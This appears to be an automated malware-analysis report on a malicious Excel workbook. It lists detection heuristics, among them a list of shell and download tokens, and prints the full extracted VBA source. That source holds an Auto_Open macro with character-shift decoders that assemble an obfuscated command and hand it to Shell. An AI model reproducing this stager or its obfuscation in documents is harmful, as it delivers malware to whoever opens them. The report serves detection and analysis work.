Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ab28c438d647d8e…

MALICIOUS

Office (OLE)

74.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2021-02-09
MD5: a8a8d792f404ecf97d0df751f6832bcf SHA-1: 499d16977ace09d8158285304259db920e72d1fa SHA-256: 2ab28c438d647d8e62e78f4307095874d62d28aeb073e5823aee2bbf38d038f2
Risk score: 256

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-7011426-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7011426-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (rs0 + rs3 + rs1 + rs2)
  • VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELL
    VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
    Matched line in script
    For aiWDAOpxi = 1 To Len(V4JVdoDM6)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3162 bytes
SHA-256: f21bd4c8b70e8ac5cf74263d704cd0a3e7113138850fed3c7670bf18930fe13a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Standard module carved as macros.bas. Every procedure with attacker logic in this
' sample (Auto_Open and the two character-shift decoders) lives in this module.
Sub Auto_Open()
' Auto-exec entry point: Excel runs this when the workbook is opened and macros are
' enabled (matched by OLE_VBA_AUTO). Each rs* fragment is a short literal pushed
' through the two identical character-shift decoders below (SMfVNQqv2, QzeBBKA8y)
' and then patched with Replace. The shift amounts are themselves produced by
' decoding one-character literals such as "<" and "4", so the command never
' appears in clear anywhere in the source.
rs0 = Replace(QzeBBKA8y(SMfVNQqv2("~„a…r1a", SMfVNQqv2("<", "4")), SMfVNQqv2("@", SMfVNQqv2("?", SMfVNQqv2("<", "4")))), QzeBBKA8y(SMfVNQqv2("S", "2"), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))), QzeBBKA8y(SMfVNQqv2("m", SMfVNQqv2(":", "6")), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))))
rs2 = Replace(QzeBBKA8y(SMfVNQqv2("Wo~}~l[VPƒxp^OP", "6"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("S", "2"), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))), QzeBBKA8y(SMfVNQqv2("Nsg", "2"), SMfVNQqv2(":", "6")))
rs1 = Replace(QzeBBKA8y(SMfVNQqv2("pw[q}{=", "9"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("T", "2"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("�y†;", "6"), SMfVNQqv2("?", SMfVNQqv2("<", "4"))))
rs3 = Replace(QzeBBKA8y(SMfVNQqv2("||xB77KKK6", SMfVNQqv2(";", "8")), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("M", "2"), SMfVNQqv2("<", "4")), QzeBBKA8y(SMfVNQqv2(" ", "5"), SMfVNQqv2(";", "8")))
' The fragments are concatenated in a different order than they were assigned
' (rs0, rs3, rs1, rs2) and handed straight to Shell, which is what OLE_VBA_SHELL and
' OLE_VBA_ASC_CHR_SHIFT_SHELL flag: a command stager. Several literals above
' ("~„a…", "ƒ", "†", and the replacement character in rs1) sit outside 7-bit ASCII
' and depend on the ANSI code page, and this rendered preview may have garbled
' them; recover the real command line by emulating the decoders against the carved
' macros.bas (SHA-256 f21bd4c8…fe13a) rather than this text, then record it as an IoC.
Shell (rs0 + rs3 + rs1 + rs2)
End Sub
Public Function QzeBBKA8y(V4JVdoDM6 As String, pqcIpxLC9 As Integer)
' Character-shift decoder: subtracts pqcIpxLC9 from the character code of every
' character of V4JVdoDM6 (Asc/Chr, so ANSI code page, no wrap-around) and returns
' the shifted string. Callers pass the shift as a one-character string such as "4",
' which VBA coerces to the Integer parameter. Byte-for-byte the same algorithm as
' SMfVNQqv2 below; the duplicate name presumably only makes the call tree harder to
' follow. This is the Mid/Asc/Chr loop that OLE_VBA_ASC_CHR_SHIFT_SHELL matched.
Dim aiWDAOpxi As Integer
For aiWDAOpxi = 1 To Len(V4JVdoDM6)
' Mid on the left-hand side overwrites one character of the argument in place.
Mid(V4JVdoDM6, aiWDAOpxi, 1) = Chr(Asc(Mid(V4JVdoDM6, aiWDAOpxi, 1)) - pqcIpxLC9)
Next aiWDAOpxi
QzeBBKA8y = V4JVdoDM6
End Function
Public Function SMfVNQqv2(zRc9PYTbD As String, LoEyylR6D As Integer)
    ' Second copy of the character-shift decoder: each character of zRc9PYTbD is
    ' replaced by Chr(Asc(c) - LoEyylR6D) and the result is returned. Identical in
    ' behaviour to QzeBBKA8y above; Auto_Open nests calls to both so that the shift
    ' amounts (e.g. SMfVNQqv2("<", "4")) are computed rather than written as numbers.
    ' A detection that keys on this loop shape rather than on the random procedure
    ' names will survive the attacker renaming these functions.
    Dim FKtD6Y0KV As Integer
    For FKtD6Y0KV = 1 To Len(zRc9PYTbD)
        ' In-place single-character overwrite via Mid assignment.
        Mid(zRc9PYTbD, FKtD6Y0KV, 1) = Chr(Asc(Mid(zRc9PYTbD, FKtD6Y0KV, 1)) - LoEyylR6D)
    Next FKtD6Y0KV
    SMfVNQqv2 = zRc9PYTbD
End Function

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Boilerplate header the VBA exporter writes for the ThisWorkbook document module;
' the attributes carry no attacker logic.
Sub Workbook_Open()
' Empty second auto-exec entry point (matched by OLE_VBA_WBOPEN). It does nothing
' itself; the live stager is Auto_Open in Module1. Presumably a leftover from the
' template the document was built from, but keep it in the detection rationale.

End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Worksheet document-module header only; Sheet1 contains no code.

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Worksheet document-module header only; Sheet2 contains no code.

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Worksheet document-module header only; Sheet3 contains no code. The three sheet
' modules and ThisWorkbook together account for the "5 related findings" under
' OLE_VBA_MACROS even though only Module1 carries executable logic.